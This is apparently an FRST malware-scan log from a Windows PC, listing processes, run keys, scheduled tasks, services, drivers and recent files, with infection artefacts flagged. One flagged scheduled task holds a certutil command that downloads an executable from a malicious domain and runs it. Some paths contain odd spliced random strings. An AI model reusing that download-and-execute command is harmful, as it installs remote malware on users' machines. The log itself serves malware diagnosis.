(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Windows Media Audio AEC for Media Foundation) (Access Denied) C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7953576 2017-05-10] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
HKLM\...\Run: [PrintDisp] => C:\Windows\system32\PrintDisp.exe [588936 2015-08-18] (ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [976032 2011-09-16] (Atheros Communications Inc. -> Atheros Communications) [File not signed]
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [799904 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2778864 2014-08-06] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-08-27] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2109064 2019-11-27] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CCleaner Monitoring] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Policies\...\system: [disablecmd] 0
HKU\S-1-5-18\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [30860272 2019-06-18] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-23] (Google LLC -> Google LLC)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [159480 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk [2019-05-12]
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {043F5EB4-82CE-46AA-BE56-7668C5C64C5E} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {1DE2EE32-D3F2-49E9-A9B3-B3B665DC515B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {2D417548-BA65-4EE7-8774-0A7D26D81927} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {51CC2622-5A74-4047-8C6D-C3C3CC65EC8A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rvice.exe [335416 2020-01-21] (Adobe Inc. -> Adobe)
Task: {5C3781C4-8E63-4EE9-BD6E-23BD81C33BC9} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_321_Plugin.exe [1458232 2020-01-21] (Adobe Inc. -> Adobe)
Task: {905A300B-6470-42D2-87C0-0A406C62E55F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {973AEEE8-1D02-4786-946B-3A7611DB49FC} - System32\Tasks\HPCustPartic.exe_{497FF387-CFCE-4B3F-9361-4D1F864871FC} => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {A4CB1FE6-864E-4AC1-8079-C8F6B56E7208} - System32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DD5C372A-1601-4F80-9BD1-91EBB6A059E8} - System1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E289981D-7DE7-44EA-8295-33A39EFCC113} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E6660E0C-2898-438C-92D1-1B9BC249F29E} - System32\Tasks\HPCustParticipation HP LaserJet MFP M28-M31 => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {EC032B4F-84FF-4698-AA3E-EB8CEC1F95CE} - System32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479\{XXIL7BBA-VLUN-1SE5-VAVW-AAH7L2DBI1PZ} => C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe [0 0000-00-00] (Windows Media Audio AEC for Media Foundation) (Access Denied)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8A644A86-7EBB-4639-9455-DF1016EC069A}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FF69FF1A-22D7-4392-824F-9C30EFD876FD}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
FireFox:
========
FF DefaultProfile: zzgehp0c.default-1579206376147
FF ProfilePath: C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiofiles\zzgehp0c.default-1579206376147 [2020-02-07]
FF Extension: (Adaware Secure Search) - C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\@newtab-omni.xpi [2019-10-20]
FF HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default [2020-01-26]
CHR Notifications: Default -> hxxps://www.youtube.com
CHR Extension: (Prezentácie) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-07]
CHR Extension: (SEOquake) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2020-01-08]
CHR Extension: (Dokumenty) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-08]
CHR Extension: (Disk Google) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-08]
CHR Extension: (YouTube) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-08]
CHR Extension: (Tabuľky) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-07]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-01-26]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2019-05-08]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-08]
CHR Extension: (Gmail) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-08]
CHR Extension: (Chrome Media Router) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <not found>
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-08-26] (Apple Inc. -> Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [105120 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
R2 ibtsiva; C:\Windows\system32\ibtsiva.exe [184072 2017-01-13] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [359680 2019-07-12] (Intel Corporation -> Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268968 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> )
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2017-01-08] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-02-07] () [File not signed]
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3758760 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> Intel® Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 amdhub30; C:\Windows\system32\drivers\amdhub30.sys [108768 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdhub31; C:\Windows\system32\drivers\amdhub31.sys [141528 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 amdxhc; C:\Windows\system32\drivers\amdxhc.sys [229088 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdxhc31; C:\Windows\system32\drivers\amdxhc31.sys [440536 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] (CHENGDU AOMEI Tech Co., Ltd. -> )
R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [118184 2018-05-14] (Alcorlink Corp. -> )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [101352 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [158696 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1560552 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [39296 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 FLxHCIh; C:\Windows\system32\drivers\FLxHCIh.sys [88016 2016-12-09] (Fresco Logic Inc -> Fresco Logic)
S3 IaNVMe; C:\Windows\system32\drivers\IaNVMe.sys [113160 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
R0 IaNVMeF; C:\Windows\System32\drivers\IaNVMeF.sys [35848 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
S3 IaRNVMe; C:\Windows\system32\drivers\IaRNVMe.sys [592408 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R0 IaRNVMeF; C:\Windows\System32\drivers\IaRNVMeF.sys [36888 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [206344 2017-06-27] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
R3 L1C; C:\Windows\System32\DRIVERS\L1C63x64.sys [125048 2016-01-29] (Rivet Networks LLC -> Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [199760 2016-11-29] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0061.sys [38088 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3427848 2017-11-08] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
S3 ocznvme; C:\Windows\system32\drivers\ocznvme.sys [99592 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
R0 ocztrimfilter; C:\Windows\System32\drivers\ocztrimfilter.sys [29064 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
S3 rusb3hub; C:\Windows\system32\drivers\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
S3 rusb3xhc; C:\Windows\system32\drivers\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [49864 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [41512 2017-12-07] (Intel Corporation -> )
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-05-02] (Synaptics Incorporated -> Synaptics Incorporated)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 STHDA; C:\Windows\System32\DRIVERS\stwrt64.sys [551936 2013-08-16] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 tilfilter; C:\Windows\system32\drivers\TIxHCIlfilter.sys [17672 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 tiufilter; C:\Windows\system32\drivers\TIxHCIufilter.sys [23304 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-02-01] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 VUSB3HUB; C:\Windows\system32\drivers\ViaHub3.sys [221696 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 xhcdrv; C:\Windows\system32\drivers\xhcdrv.sys [294912 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-07 20:46 - 2020-02-07 20:46 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\EpicNet Inc
2020-02-07 20:45 - 2020-02-07 20:45 - 002079744 ____H C:\Windows\windefender.exe
2020-02-07 20:45 - 2020-02-07 20:45 - 000003490 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-02-07 20:44 - 2020-02-07 20:44 - 000000000 ___RD C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiStart Menu\Programs\BT Devices
2020-02-07 20:40 - 2020-02-07 20:19 - 008356016 _____ (Malwarebytes) C:\Users\Jomko\Desktop\adwcleaner_8.0.2.exe
2020-02-06 21:29 - 2020-02-06 21:30 - 000047825 _____ C:\Users\Jomko\Desktop\Addition.txt
2020-02-06 21:28 - 2020-02-07 20:56 - 000027126 _____ C:\Users\Jomko\Desktop\FRST.txt
2020-02-06 21:27 - 2020-02-06 21:23 - 002279424 _____ (Farbar) C:\Users\Jomko\Desktop\FRST64.exe
2020-02-06 21:24 - 2020-02-07 20:55 - 000000000 ____D C:\FRST
2020-01-26 19:07 - 2020-01-26 19:07 - 000077280 _____ (Bitvise Limited) C:\Windows\system32\BvEventSource.exe
2020-01-26 19:07 - 2020-01-26 19:07 - 000076336 _____ (Bitvise Limited) C:\Windows\MstscTitle64.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000069168 _____ (Bitvise Limited) C:\Windows\MstscTitle32.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\Users\Public\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\ProgramData\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Users\Jomko\AppData\Local\Bitvise
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitvise SSH Client
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Program Files (x86)\Bitvise SSH Client
2020-01-26 15:54 - 2020-01-26 15:54 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Google
2020-01-25 00:49 - 2020-01-25 00:49 - 000000000 ____D C:\Windows\pss
2020-01-25 00:24 - 2020-01-25 00:24 - 000003158 _____ C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
2020-01-25 00:22 - 2020-01-25 00:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-01-25 00:21 - 2020-01-25 00:21 - 000000000 ____D C:\Program Files\Malwarebytes
2020-01-24 21:54 - 2020-01-24 21:54 - 000389624 _____ C:\Windows\Minidump\012420-10249-01.dmp
2020-01-22 23:59 - 2020-01-22 23:59 - 000001617 _____ C:\Users\Jomko\Desktop\Kodi.lnk
2020-01-22 23:07 - 2020-01-26 18:25 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\Program Files\Kodi
2020-01-22 22:54 - 2020-01-24 21:00 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\vlc
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\Users\Public\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\ProgramData\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-01-22 22:50 - 2020-01-22 22:50 - 000000000 ____D C:\Program Files\VideoLAN
2020-01-22 20:46 - 2020-01-22 20:47 - 000000000 ___SD C:\32788R22FWJFW
2020-01-22 20:28 - 2020-01-22 20:28 - 000034489 _____ C:\ComboFix.txt
